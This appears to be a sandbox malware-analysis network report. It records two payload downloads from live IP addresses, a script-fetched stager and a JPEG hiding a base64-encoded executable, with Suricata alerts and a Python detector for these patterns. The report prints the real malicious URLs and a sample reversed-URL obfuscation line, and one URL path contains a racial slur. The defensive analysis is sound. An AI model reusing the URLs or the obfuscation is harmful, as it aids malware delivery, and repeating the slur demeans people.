Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. | | |
Both HTTP requests below go to IP literals (91.92.254.14 and 91.92.254.194), so no DNS lookups are expected in this capture.
HTTP Requests
GET 200 http://91.92.254.14/Users_API/negrocock/file_in0kfcuh.ojw.txt
Request:
GET /Users_API/negrocock/file_in0kfcuh.ojw.txt HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: ko
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: 91.92.254.14
Response:
HTTP/1.1 200 OK
Date: Thu, 04 Jul 2024 01:39:19 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Wed, 03 Jul 2024 19:32:08 GMT
ETag: "584-61c5ce2d0b714"
Accept-Ranges: bytes
Content-Length: 1412
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain
Note: the User-Agent is the default string sent by the WinHttp.WinHttpRequest COM object, so this download was made by a script (WSH/VBScript/JScript/PowerShell) rather than a browser. The 1412-byte text/plain body is not included in the report.

GET 200 http://91.92.254.194/imge/new-image_v.jpg
Request:
GET /imge/new-image_v.jpg HTTP/1.1
Host: 91.92.254.194
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Date: Thu, 04 Jul 2024 01:39:21 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Wed, 03 Jul 2024 13:17:15 GMT
ETag: "67fd9-61c57a629b9c6"
Accept-Ranges: bytes
Content-Length: 425945
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/jpeg
Note: unlike the first fetch, this request sends no User-Agent or Accept header at all. The response is declared image/jpeg (425945 bytes); the Suricata alerts below indicate that it carries a base64-encoded MZ executable rather than, or in addition to, image data.
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 91.92.254.194:80 -> 192.168.56.101:49164 | 2400012 | ET DROP Spamhaus DROP Listed Traffic Inbound group 13 | Misc Attack |
TCP 91.92.254.14:80 -> 192.168.56.101:49161 | 2400012 | ET DROP Spamhaus DROP Listed Traffic Inbound group 13 | Misc Attack |
TCP 91.92.254.14:80 -> 192.168.56.101:49161 | 2049038 | ET MALWARE Malicious Base64 Encoded Payload In Image | A Network Trojan was detected |
TCP 91.92.254.194:80 -> 192.168.56.101:49164 | 2047750 | ET MALWARE Base64 Encoded MZ In Image | A Network Trojan was detected |
TCP 91.92.254.194:80 -> 192.168.56.101:49164 | 2049038 | ET MALWARE Malicious Base64 Encoded Payload In Image | A Network Trojan was detected |
TCP 91.92.254.14:80 -> 192.168.56.101:49161 | 2012325 | ET WEB_CLIENT Obfuscated Javascript // ptth | Potentially Bad Traffic |
The two 2400012 hits are reputation matches (both source addresses were on the Spamhaus DROP list at the time of the run) and say nothing about the content. 2047750 and 2049038 are content matches on the response bodies: the image/jpeg response from 91.92.254.194 carries a base64-encoded MZ header, and 2049038 also fired on the text/plain response from 91.92.254.14, so the .txt stager carries base64-encoded content as well. 2012325 matches the string "//:ptth", a reversed "http://", a common string-obfuscation trick in script droppers; it fired on that same text response.
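The alerts above describe two content patterns (a base64-encoded MZ header inside a body served as an image, and a reversed "http://" in a script body) plus a client fingerprint visible in the first request. The following Python is an added example, not part of the sandbox report or of any Suricata rule set, that reproduces those checks over raw HTTP messages. The response bodies are constructed samples with a placeholder host (example.invalid), because the report does not include the real bodies; the request headers are copied from the first exchange above. Unlike a fixed-string signature, it decodes every long base64 run, so it catches any byte alignment of the MZ header, and it follows the e_lfanew pointer to confirm a PE signature.

```python
import base64
import re

# --- constructed samples (the report does not include the response bodies) ---

def _fake_pe_stub() -> bytes:
    """Minimal MZ/PE header shape used only as a stand-in payload (constructed)."""
    hdr = bytearray(0x48)
    hdr[0:2] = b"MZ"                                # DOS header magic
    hdr[0x3C:0x40] = (0x40).to_bytes(4, "little")   # e_lfanew -> offset of "PE\0\0"
    hdr[0x40:0x44] = b"PE\x00\x00"                  # PE signature
    return bytes(hdr)

JPEG_PREFIX = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00" + b"\x00" * 24
SAMPLE_IMAGE_BODY = JPEG_PREFIX + base64.b64encode(_fake_pe_stub()) + b"\xff\xd9"

# Constructed script body storing its URL backwards (placeholder host).
SAMPLE_TEXT_BODY = (
    b'var u = "gpj.daolyap/dilavni.elpmaxe//:ptth".split("").reverse().join("");\r\n'
)

def _response(ctype: bytes, body: bytes) -> bytes:
    return (b"HTTP/1.1 200 OK\r\nContent-Type: " + ctype + b"\r\nContent-Length: "
            + str(len(body)).encode() + b"\r\n\r\n" + body)

SAMPLE_IMAGE_RESPONSE = _response(b"image/jpeg", SAMPLE_IMAGE_BODY)
SAMPLE_TEXT_RESPONSE = _response(b"text/plain", SAMPLE_TEXT_BODY)

# Request headers copied from the first exchange in the report above.
SAMPLE_REQUEST = (
    b"GET /Users_API/negrocock/file_in0kfcuh.ojw.txt HTTP/1.1\r\n"
    b"Connection: Keep-Alive\r\nAccept: */*\r\nAccept-Language: ko\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\n"
    b"Host: 91.92.254.14\r\n\r\n"
)

# --- parsing ---

def _headers(lines):
    out = {}
    for line in lines:
        k, _, v = line.partition(b":")
        out[k.strip().lower().decode("latin-1")] = v.strip().decode("latin-1")
    return out

def parse_response(raw: bytes):
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    return int(lines[0].split()[1]), _headers(lines[1:]), body

def parse_request(raw: bytes):
    head, _, _ = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, target, _ = lines[0].split(b" ", 2)
    return method.decode(), target.decode(), _headers(lines[1:])

# --- detections ---

B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")
REVERSED_URL = re.compile(rb"[A-Za-z0-9._~:/?#%&=+\-]+//:s?ptth")

def embedded_pe_payloads(body: bytes) -> list:
    """Decode every long base64 run; report those that decode to an MZ header.
    Decoding (instead of matching one literal such as TVqQAAMAAAAEAAAA) works
    for any byte alignment and any DOS-stub variant."""
    hits = []
    for m in B64_RUN.finditer(body):
        run = m.group(0)
        run = run[: len(run) - len(run) % 4]        # drop a ragged tail
        try:
            blob = base64.b64decode(run, validate=True)
        except ValueError:
            continue
        if blob[:2] != b"MZ" or len(blob) < 0x40:
            continue
        e_lfanew = int.from_bytes(blob[0x3C:0x40], "little")
        hits.append({"offset": m.start(), "decoded_len": len(blob),
                     "pe_signature": blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"})
    return hits

def reversed_urls(body: bytes) -> list:
    """Recover URLs stored backwards (the "//:ptth" obfuscation)."""
    return [m.group(0)[::-1].decode("latin-1") for m in REVERSED_URL.finditer(body)]

def is_scripted_download(raw_request: bytes) -> bool:
    """WinHttp.WinHttpRequest.5 is the default UA of the WinHTTP COM object,
    i.e. the request came from a script, not a browser."""
    _, _, h = parse_request(raw_request)
    return "winhttp.winhttprequest" in h.get("user-agent", "").lower()

def analyze(raw_response: bytes) -> list:
    """Alert strings in the spirit of ET 2047750/2049038 and 2012325."""
    _, headers, body = parse_response(raw_response)
    ctype = headers.get("content-type", "").lower()
    alerts = []
    if ctype.startswith("image/") and not body.startswith((b"\xff\xd8", b"\x89PNG", b"GIF8")):
        alerts.append("declared image/* but body has no image magic")
    for hit in embedded_pe_payloads(body):
        kind = "image" if ctype.startswith("image/") else (ctype or "unknown")
        alerts.append(f"base64-encoded MZ in {kind} body at offset {hit['offset']} "
                      f"(PE signature {'present' if hit['pe_signature'] else 'absent'})")
    for url in reversed_urls(body):
        alerts.append(f"reversed URL in body: {url}")
    return alerts

if __name__ == "__main__":
    print("scripted client:", is_scripted_download(SAMPLE_REQUEST))
    for name, resp in (("image", SAMPLE_IMAGE_RESPONSE), ("text", SAMPLE_TEXT_RESPONSE)):
        print(name, analyze(resp))
```

Decoding every base64 run is more expensive than a literal content match, so in a live sensor this belongs as a second-stage check on flows a cheaper rule has already flagged, or on bodies below a size cap; on a captured pcap from a sandbox run it is cheap enough to run over everything.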
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts